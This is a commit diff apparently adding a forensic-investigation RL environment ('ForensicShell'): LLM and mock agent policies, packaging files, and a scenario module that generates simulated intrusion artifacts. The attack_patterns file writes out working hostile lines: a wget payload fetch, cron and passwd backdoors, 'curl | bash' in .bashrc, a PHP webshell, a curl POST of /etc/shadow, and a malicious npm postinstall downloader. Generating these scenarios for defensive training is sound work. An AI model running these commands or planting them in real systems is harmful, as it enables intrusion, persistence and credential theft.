yashppawar commited on
Commit
c36ffd2
·
verified ·
1 Parent(s): 4581fcf

Upload folder using huggingface_hub

Browse files
agents/__init__.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ """
2
+ Agent policies for ForensicShell. Shared between inference.py (hackathon
3
+ entry point) and rl/rollout.py (training data collector) so both emit
4
+ identical action distributions.
5
+ """
agents/llm_policy.py ADDED
@@ -0,0 +1,337 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Shared LLM-backed policy.
3
+
4
+ Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
5
+ turns a ForensicShellObservation + episode context into a ForensicShellAction.
6
+ Used by inference.py (baseline submission script) and by rl/rollout.py
7
+ (training data collector). Both call sites share parsing + fallback logic so
8
+ bugs never drift between them.
9
+
10
+ The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
11
+ - Groq / HF Router quota is exhausted
12
+ - Running in CI (no outbound network)
13
+ - Doing a quick smoke test
14
+ """
15
+
16
+ from __future__ import annotations
17
+
18
+ import json
19
+ import re
20
+ import textwrap
21
+ from dataclasses import dataclass, field
22
+ from typing import Any, Dict, List, Optional, Protocol
23
+
24
+ from openai import OpenAI
25
+
26
+ from forensic_shell.models import (
27
+ ForensicReport,
28
+ ForensicShellAction,
29
+ ForensicShellObservation,
30
+ TimelineEvent,
31
+ )
32
+
33
+
34
+ VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
35
+
36
+
37
+ SYSTEM_PROMPT = textwrap.dedent(
38
+ """
39
+ You are a digital forensics investigator with shell-like read-only access
40
+ to a compromised Linux host. Investigate by calling actions and then submit
41
+ a final ForensicReport.
42
+
43
+ Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
44
+ Allowed actions:
45
+
46
+ {"action_type": "list_dir", "path": "/some/dir"}
47
+ {"action_type": "read_file", "path": "/some/file", "max_bytes": 2048}
48
+ {"action_type": "grep", "pattern": "substring", "path": "/some/file"}
49
+ {"action_type": "stat", "path": "/some/file"}
50
+ {"action_type": "submit_report","report": {
51
+ "compromised_user": "alice",
52
+ "initial_ip": "198.51.100.77",
53
+ "modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
54
+ "backdoor_sha256": "abcdef...",
55
+ "timeline": [
56
+ {"phase": "login", "detail": "ssh from ..."},
57
+ {"phase": "recon", "detail": "whoami; id"},
58
+ {"phase": "privesc", "detail": "sudo ..."},
59
+ {"phase": "persistence", "detail": "crontab ..."},
60
+ {"phase": "exfil", "detail": "curl POST ..."}
61
+ ]
62
+ }}
63
+
64
+ Rules:
65
+ - Output EXACTLY ONE JSON object. No commentary, no markdown.
66
+ - Start with list_dir on /var/log and /home to orient yourself.
67
+ - Read /var/log/auth.log to find the compromised user and source IP.
68
+ - For medium/hard tasks, also find modified files and use 'stat' to
69
+ compute the backdoor SHA256 (the stat action returns sha256).
70
+ - For the hard task, reconstruct the attacker's kill chain as an ordered
71
+ timeline: login -> recon -> privesc -> persistence -> exfil.
72
+ - Submit only once you are confident — submit_report ends the episode.
73
+ - You have a strict step budget; do not waste actions.
74
+ """
75
+ ).strip()
76
+
77
+
78
+ # ---------------------------------------------------------------------------
79
+ # Action parsing helpers — shared between real and mock policies
80
+ # ---------------------------------------------------------------------------
81
+
82
+ def parse_action(raw: str) -> ForensicShellAction:
83
+ """
84
+ Robustly parse an LLM reply (or any JSON-ish string) into a
85
+ ForensicShellAction. On any failure, fall back to a no-op list_dir('/').
86
+ """
87
+ if not raw:
88
+ return ForensicShellAction(action_type="list_dir", path="/")
89
+
90
+ text = raw.strip()
91
+ # Strip accidental markdown fences
92
+ if text.startswith("```"):
93
+ text = text.strip("`")
94
+ if "\n" in text:
95
+ text = text.split("\n", 1)[1]
96
+ text = text.strip("`").strip()
97
+
98
+ # Locate the first {...} block to tolerate leading/trailing prose
99
+ first, last = text.find("{"), text.rfind("}")
100
+ if first != -1 and last != -1 and last > first:
101
+ text = text[first : last + 1]
102
+
103
+ try:
104
+ data: Dict[str, Any] = json.loads(text)
105
+ except Exception:
106
+ return ForensicShellAction(action_type="list_dir", path="/")
107
+
108
+ action_type = data.get("action_type") or data.get("type") or "list_dir"
109
+
110
+ report_obj: Optional[ForensicReport] = None
111
+ report_data = data.get("report")
112
+ if isinstance(report_data, dict):
113
+ tl = report_data.get("timeline") or []
114
+ clean_tl: List[TimelineEvent] = []
115
+ for item in tl:
116
+ if not isinstance(item, dict):
117
+ continue
118
+ phase = item.get("phase")
119
+ if phase in VALID_PHASES:
120
+ clean_tl.append(TimelineEvent(phase=phase, detail=str(item.get("detail", ""))))
121
+ try:
122
+ report_obj = ForensicReport(
123
+ compromised_user=report_data.get("compromised_user"),
124
+ initial_ip=report_data.get("initial_ip"),
125
+ modified_files=list(report_data.get("modified_files") or []),
126
+ backdoor_sha256=report_data.get("backdoor_sha256"),
127
+ timeline=clean_tl,
128
+ )
129
+ except Exception:
130
+ report_obj = ForensicReport()
131
+
132
+ try:
133
+ return ForensicShellAction(
134
+ action_type=action_type,
135
+ path=data.get("path"),
136
+ pattern=data.get("pattern"),
137
+ max_bytes=int(data.get("max_bytes") or 2048),
138
+ report=report_obj,
139
+ )
140
+ except Exception:
141
+ return ForensicShellAction(action_type="list_dir", path="/")
142
+
143
+
144
+ def action_to_str(action: ForensicShellAction) -> str:
145
+ if action.action_type == "list_dir":
146
+ return f"list_dir({action.path!r})"
147
+ if action.action_type == "read_file":
148
+ return f"read_file({action.path!r},{action.max_bytes})"
149
+ if action.action_type == "grep":
150
+ return f"grep({action.pattern!r},{action.path!r})"
151
+ if action.action_type == "stat":
152
+ return f"stat({action.path!r})"
153
+ if action.action_type == "submit_report":
154
+ return "submit_report(...)"
155
+ return action.action_type
156
+
157
+
158
+ # ---------------------------------------------------------------------------
159
+ # Policy protocol
160
+ # ---------------------------------------------------------------------------
161
+
162
+ class PolicyProtocol(Protocol):
163
+ name: str
164
+
165
+ def act(
166
+ self,
167
+ observation: ForensicShellObservation,
168
+ history: List[str],
169
+ step: int,
170
+ ) -> ForensicShellAction: ...
171
+
172
+
173
+ # ---------------------------------------------------------------------------
174
+ # Real LLM-backed policy
175
+ # ---------------------------------------------------------------------------
176
+
177
+ @dataclass
178
+ class LLMPolicy:
179
+ client: OpenAI
180
+ model: str
181
+ name: str = "llm"
182
+ temperature: float = 0.2
183
+ max_tokens: int = 700
184
+ system_prompt: str = SYSTEM_PROMPT
185
+
186
+ def _build_user_prompt(
187
+ self,
188
+ observation: ForensicShellObservation,
189
+ history: List[str],
190
+ step: int,
191
+ ) -> str:
192
+ history_block = "\n".join(history[-6:]) if history else "(none yet)"
193
+ last_output = (observation.output or "")[:1500]
194
+ return textwrap.dedent(
195
+ f"""
196
+ TASK: {observation.task_description}
197
+
198
+ Step: {step}
199
+ Steps remaining (including this one): {observation.steps_remaining}
200
+ Last action error: {observation.action_error or "none"}
201
+ Last action output:
202
+ ---
203
+ {last_output}
204
+ ---
205
+ Recent history:
206
+ {history_block}
207
+
208
+ Reply with ONE JSON action object only.
209
+ """
210
+ ).strip()
211
+
212
+ def act(
213
+ self,
214
+ observation: ForensicShellObservation,
215
+ history: List[str],
216
+ step: int,
217
+ ) -> ForensicShellAction:
218
+ user_prompt = self._build_user_prompt(observation, history, step)
219
+ try:
220
+ completion = self.client.chat.completions.create(
221
+ model=self.model,
222
+ messages=[
223
+ {"role": "system", "content": self.system_prompt},
224
+ {"role": "user", "content": user_prompt},
225
+ ],
226
+ temperature=self.temperature,
227
+ max_tokens=self.max_tokens,
228
+ stream=False,
229
+ )
230
+ raw = (completion.choices[0].message.content or "").strip()
231
+ except Exception as exc: # pragma: no cover - network-dependent
232
+ print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
233
+ raw = ""
234
+ return parse_action(raw)
235
+
236
+
237
+ # ---------------------------------------------------------------------------
238
+ # Mock / heuristic policy — no LLM required
239
+ # ---------------------------------------------------------------------------
240
+
241
+ _ACCEPTED_RE = re.compile(
242
+ r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
243
+ )
244
+
245
+
246
+ @dataclass
247
+ class MockPolicy:
248
+ """
249
+ Rule-based, no-network policy. Follows a fixed investigation recipe and
250
+ submits based on whatever it observed. Used as a resilient fallback in
251
+ inference.py when no API key is present and in CI where outbound network
252
+ is blocked.
253
+ """
254
+ name: str = "mock"
255
+ _plan: List[ForensicShellAction] = field(default_factory=list)
256
+ _step: int = 0
257
+ _observed_user: Optional[str] = None
258
+ _observed_ip: Optional[str] = None
259
+ _observed_sha: Optional[str] = None
260
+ _observed_paths: List[str] = field(default_factory=list)
261
+
262
+ def _reset_plan(self) -> None:
263
+ self._plan = [
264
+ ForensicShellAction(action_type="list_dir", path="/var/log"),
265
+ ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
266
+ ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
267
+ ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
268
+ ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
269
+ ForensicShellAction(action_type="list_dir", path="/var/www/html"),
270
+ ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
271
+ ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
272
+ ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
273
+ ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
274
+ ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
275
+ ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
276
+ ]
277
+ self._step = 0
278
+ self._observed_user = None
279
+ self._observed_ip = None
280
+ self._observed_sha = None
281
+ self._observed_paths = []
282
+
283
+ def _harvest(self, observation: ForensicShellObservation) -> None:
284
+ out = observation.output or ""
285
+ # Pull first accepted-login from grep output (prefer non-RFC1918)
286
+ for line in out.splitlines():
287
+ m = _ACCEPTED_RE.search(line)
288
+ if m:
289
+ user, ip = m.group(1), m.group(2)
290
+ if not ip.startswith(("10.", "172.16.", "192.168.")):
291
+ self._observed_user = user
292
+ self._observed_ip = ip
293
+ break
294
+ if self._observed_user is None:
295
+ self._observed_user = user
296
+ self._observed_ip = ip
297
+ # Pull sha256 from stat output
298
+ if "sha256=" in out and self._observed_sha is None:
299
+ for line in out.splitlines():
300
+ if line.startswith("sha256="):
301
+ self._observed_sha = line.split("=", 1)[1].strip()
302
+ # stat line also carries path= — grab it if present
303
+ for l2 in out.splitlines():
304
+ if l2.startswith("path="):
305
+ p = l2.split("=", 1)[1].strip()
306
+ if p and p not in self._observed_paths:
307
+ self._observed_paths.append(p)
308
+ break
309
+
310
+ def _final_submit(self) -> ForensicShellAction:
311
+ timeline = [
312
+ TimelineEvent(phase=p, detail="auto")
313
+ for p in ("login", "recon", "privesc", "persistence", "exfil")
314
+ ]
315
+ report = ForensicReport(
316
+ compromised_user=self._observed_user,
317
+ initial_ip=self._observed_ip,
318
+ modified_files=list(self._observed_paths),
319
+ backdoor_sha256=self._observed_sha,
320
+ timeline=timeline,
321
+ )
322
+ return ForensicShellAction(action_type="submit_report", report=report)
323
+
324
+ def act(
325
+ self,
326
+ observation: ForensicShellObservation,
327
+ history: List[str],
328
+ step: int,
329
+ ) -> ForensicShellAction:
330
+ if step == 1:
331
+ self._reset_plan()
332
+ self._harvest(observation)
333
+ if self._step < len(self._plan):
334
+ action = self._plan[self._step]
335
+ self._step += 1
336
+ return action
337
+ return self._final_submit()
openenv_forensic_shell.egg-info/PKG-INFO CHANGED
@@ -4,6 +4,9 @@ Version: 0.1.0
4
  Summary: Forensic Shell environment for OpenEnv
5
  Requires-Python: >=3.10
6
  Requires-Dist: openenv-core[core]>=0.2.2
 
7
  Provides-Extra: dev
8
  Requires-Dist: pytest>=8.0.0; extra == "dev"
9
  Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
 
 
 
4
  Summary: Forensic Shell environment for OpenEnv
5
  Requires-Python: >=3.10
6
  Requires-Dist: openenv-core[core]>=0.2.2
7
+ Requires-Dist: openai>=1.40.0
8
  Provides-Extra: dev
9
  Requires-Dist: pytest>=8.0.0; extra == "dev"
10
  Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
11
+ Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
12
+ Requires-Dist: pytest-socket>=0.7.0; extra == "dev"
openenv_forensic_shell.egg-info/SOURCES.txt CHANGED
@@ -1,8 +1,13 @@
1
  README.md
 
 
 
2
  pyproject.toml
3
  ./__init__.py
4
  ./client.py
5
  ./models.py
 
 
6
  openenv_forensic_shell.egg-info/PKG-INFO
7
  openenv_forensic_shell.egg-info/SOURCES.txt
8
  openenv_forensic_shell.egg-info/dependency_links.txt
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
11
  openenv_forensic_shell.egg-info/top_level.txt
12
  server/__init__.py
13
  server/app.py
 
14
  server/forensic_shell_environment.py
15
  server/grader.py
 
 
16
  server/scenarios.py
 
1
  README.md
2
+ __init__.py
3
+ client.py
4
+ models.py
5
  pyproject.toml
6
  ./__init__.py
7
  ./client.py
8
  ./models.py
9
+ agents/__init__.py
10
+ agents/llm_policy.py
11
  openenv_forensic_shell.egg-info/PKG-INFO
12
  openenv_forensic_shell.egg-info/SOURCES.txt
13
  openenv_forensic_shell.egg-info/dependency_links.txt
 
16
  openenv_forensic_shell.egg-info/top_level.txt
17
  server/__init__.py
18
  server/app.py
19
+ server/attack_patterns.py
20
  server/forensic_shell_environment.py
21
  server/grader.py
22
+ server/name_pools.py
23
+ server/scenario_generator.py
24
  server/scenarios.py
openenv_forensic_shell.egg-info/requires.txt CHANGED
@@ -1,5 +1,8 @@
1
  openenv-core[core]>=0.2.2
 
2
 
3
  [dev]
4
  pytest>=8.0.0
5
  pytest-cov>=4.0.0
 
 
 
1
  openenv-core[core]>=0.2.2
2
+ openai>=1.40.0
3
 
4
  [dev]
5
  pytest>=8.0.0
6
  pytest-cov>=4.0.0
7
+ pytest-asyncio>=0.23.0
8
+ pytest-socket>=0.7.0
pyproject.toml CHANGED
@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
15
  requires-python = ">=3.10"
16
  dependencies = [
17
  # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
18
- # install from github
19
- # "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
20
  "openenv-core[core]>=0.2.2",
21
- # Environment-specific dependencies
22
- # Add all dependencies needed for your environment here
23
- # Examples:
24
- # "numpy>=1.19.0",
25
- # "torch>=2.0.0",
26
- # "gymnasium>=0.29.0",
27
- # "openspiel>=1.0.0",
28
- # "smolagents>=1.22.0,<2",
29
  ]
30
 
31
  [project.optional-dependencies]
32
  dev = [
33
  "pytest>=8.0.0",
34
  "pytest-cov>=4.0.0",
 
 
35
  ]
36
 
37
  [project.scripts]
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
41
 
42
  [tool.setuptools]
43
  include-package-data = true
44
- packages = ["forensic_shell", "forensic_shell.server"]
45
- package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server" }
 
 
 
 
 
15
  requires-python = ">=3.10"
16
  dependencies = [
17
  # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
 
 
18
  "openenv-core[core]>=0.2.2",
19
+ # ForensicShell needs the OpenAI client for LLM-backed policies
20
+ "openai>=1.40.0",
 
 
 
 
 
 
21
  ]
22
 
23
  [project.optional-dependencies]
24
  dev = [
25
  "pytest>=8.0.0",
26
  "pytest-cov>=4.0.0",
27
+ "pytest-asyncio>=0.23.0",
28
+ "pytest-socket>=0.7.0",
29
  ]
30
 
31
  [project.scripts]
 
35
 
36
  [tool.setuptools]
37
  include-package-data = true
38
+ packages = [
39
+ "forensic_shell",
40
+ "forensic_shell.server",
41
+ "forensic_shell.agents",
42
+ ]
43
+ package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }
server/attack_patterns.py ADDED
@@ -0,0 +1,288 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Attack pattern templates used by the scenario generator.
3
+
4
+ Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
5
+ SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
6
+ backdoor_bytes, backdoor_path.
7
+
8
+ The callable returns a dict describing:
9
+ - auth_log_lines: list[str] appended to /var/log/auth.log
10
+ - bash_history: str contents of the compromised user's .bash_history
11
+ - modified_files: dict[path, content] — system files changed by the attacker
12
+ - modified_paths: list[str] — the subset the grader expects (subset of modified_files)
13
+ - timeline: list[dict(phase, detail)] — 5-phase kill chain for hard tier
14
+ - pattern_tag: short slug used in task_id
15
+
16
+ All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
17
+ looks self-consistent. Nothing here touches global random state.
18
+ """
19
+
20
+ from datetime import timedelta
21
+
22
+
23
+ def _fmt_ts(ts):
24
+ return ts.strftime("%b %d %H:%M:%S")
25
+
26
+
27
+ # ---------------------------------------------------------------------------
28
+ # Pattern 1 — SSH brute force -> wget payload -> cron persistence
29
+ # ---------------------------------------------------------------------------
30
+
31
+ def ssh_brute(ctx):
32
+ user, ip, host = ctx.user, ctx.ip, ctx.host
33
+ ts = ctx.ts_base
34
+ auth = [
35
+ f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
36
+ f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
37
+ f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
38
+ f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
39
+ f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
40
+ f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}",
41
+ f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync",
42
+ ]
43
+ bash = (
44
+ f"cd /tmp\n"
45
+ f"wget -q http://{ip}/payload/.{ctx.short}\n"
46
+ f"chmod +x .{ctx.short}\n"
47
+ f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n"
48
+ f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n"
49
+ f"history -c\n"
50
+ f"exit\n"
51
+ )
52
+ cron_path = f"/etc/cron.d/{ctx.short}-sync"
53
+ cron_content = (
54
+ f"# Managed by deploy\n"
55
+ f"0 3 * * * root /usr/local/sbin/logrotate.sh\n"
56
+ f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n"
57
+ )
58
+ passwd_content = (
59
+ f"root:x:0:0:root:/root:/bin/bash\n"
60
+ f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
61
+ f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n" # attacker-added backdoor acct
62
+ )
63
+ modified_files = {
64
+ "/etc/passwd": passwd_content,
65
+ cron_path: cron_content,
66
+ ctx.backdoor_path: ctx.backdoor_bytes,
67
+ }
68
+ timeline = [
69
+ {"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
70
+ {"phase": "recon", "detail": "whoami; id; uname -a"},
71
+ {"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
72
+ {"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
73
+ {"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
74
+ ]
75
+ return dict(
76
+ pattern_tag="ssh_brute",
77
+ auth_log_lines=auth,
78
+ bash_history=bash,
79
+ modified_files=modified_files,
80
+ modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
81
+ timeline=timeline,
82
+ )
83
+
84
+
85
+ # ---------------------------------------------------------------------------
86
+ # Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
87
+ # ---------------------------------------------------------------------------
88
+
89
+ def ssh_key_theft(ctx):
90
+ user, ip, host = ctx.user, ctx.ip, ctx.host
91
+ ts = ctx.ts_base
92
+ fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
93
+ auth = [
94
+ f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
95
+ f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
96
+ f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
97
+ f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
98
+ ]
99
+ bash = (
100
+ f"cat ~/.ssh/authorized_keys\n"
101
+ f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
102
+ f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
103
+ f"chmod 600 ~/.ssh/authorized_keys\n"
104
+ f"history -c\n"
105
+ )
106
+ authorized_keys = (
107
+ f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
108
+ f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
109
+ )
110
+ bashrc = (
111
+ f"# ~/.bashrc\n"
112
+ f"alias ll='ls -la'\n"
113
+ f"export PATH=$PATH:/usr/local/bin\n"
114
+ f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
115
+ )
116
+ modified_files = {
117
+ f"/home/{user}/.ssh/authorized_keys": authorized_keys,
118
+ f"/home/{user}/.bashrc": bashrc,
119
+ ctx.backdoor_path: ctx.backdoor_bytes,
120
+ }
121
+ timeline = [
122
+ {"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
123
+ {"phase": "recon", "detail": "cat authorized_keys; env"},
124
+ {"phase": "privesc", "detail": "already had sudo"},
125
+ {"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
126
+ {"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
127
+ ]
128
+ return dict(
129
+ pattern_tag="ssh_key_theft",
130
+ auth_log_lines=auth,
131
+ bash_history=bash,
132
+ modified_files=modified_files,
133
+ modified_paths=[
134
+ f"/home/{user}/.ssh/authorized_keys",
135
+ f"/home/{user}/.bashrc",
136
+ ctx.backdoor_path,
137
+ ],
138
+ timeline=timeline,
139
+ )
140
+
141
+
142
+ # ---------------------------------------------------------------------------
143
+ # Pattern 3 — webshell upload -> php drop -> curl exfil
144
+ # ---------------------------------------------------------------------------
145
+
146
+ def webshell(ctx):
147
+ user, ip, host = ctx.user, ctx.ip, ctx.host
148
+ ts = ctx.ts_base
149
+ auth = [
150
+ f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
151
+ f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
152
+ ]
153
+ bash = (
154
+ f"curl -sO http://{ip}/shell.php\n"
155
+ f"sudo mv shell.php /var/www/html/shell.php\n"
156
+ f"sudo chown www-data:www-data /var/www/html/shell.php\n"
157
+ f"curl -s http://localhost/shell.php?cmd=id\n"
158
+ f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
159
+ f"history -c\n"
160
+ )
161
+ webshell_content = (
162
+ b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
163
+ )
164
+ modified_files = {
165
+ "/var/www/html/shell.php": webshell_content,
166
+ ctx.backdoor_path: ctx.backdoor_bytes,
167
+ }
168
+ # ensure unique paths
169
+ if ctx.backdoor_path == "/var/www/html/shell.php":
170
+ # extremely unlikely but guard anyway
171
+ modified_files[ctx.backdoor_path] = ctx.backdoor_bytes
172
+ timeline = [
173
+ {"phase": "login", "detail": f"ssh from {ip}"},
174
+ {"phase": "recon", "detail": "ls /var/www/html; id"},
175
+ {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
176
+ {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
177
+ {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
178
+ ]
179
+ return dict(
180
+ pattern_tag="webshell",
181
+ auth_log_lines=auth,
182
+ bash_history=bash,
183
+ modified_files=modified_files,
184
+ modified_paths=["/var/www/html/shell.php", ctx.backdoor_path],
185
+ timeline=timeline,
186
+ )
187
+
188
+
189
+ # ---------------------------------------------------------------------------
190
+ # Pattern 4 — supply-chain compromised package -> /usr/lib drop
191
+ # ---------------------------------------------------------------------------
192
+
193
+ def supply_chain(ctx):
194
+ user, ip, host = ctx.user, ctx.ip, ctx.host
195
+ ts = ctx.ts_base
196
+ pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
197
+ auth = [
198
+ f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
199
+ f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}",
200
+ ]
201
+ bash = (
202
+ f"npm view {pkg}\n"
203
+ f"sudo npm install -g {pkg}\n"
204
+ f"node -e 'require(\"{pkg}\")'\n"
205
+ f"ls /usr/lib/node_modules/{pkg}/\n"
206
+ f"history -c\n"
207
+ )
208
+ postinstall = (
209
+ f"// postinstall.js -- dropped by malicious {pkg}\n"
210
+ "const { exec } = require('child_process');\n"
211
+ f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n"
212
+ )
213
+ modified_files = {
214
+ f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall,
215
+ ctx.backdoor_path: ctx.backdoor_bytes,
216
+ }
217
+ timeline = [
218
+ {"phase": "login", "detail": f"pubkey from {ip}"},
219
+ {"phase": "recon", "detail": f"npm view {pkg}"},
220
+ {"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"},
221
+ {"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"},
222
+ {"phase": "exfil", "detail": f"backdoor beacons to {ip}"},
223
+ ]
224
+ return dict(
225
+ pattern_tag="supply_chain",
226
+ auth_log_lines=auth,
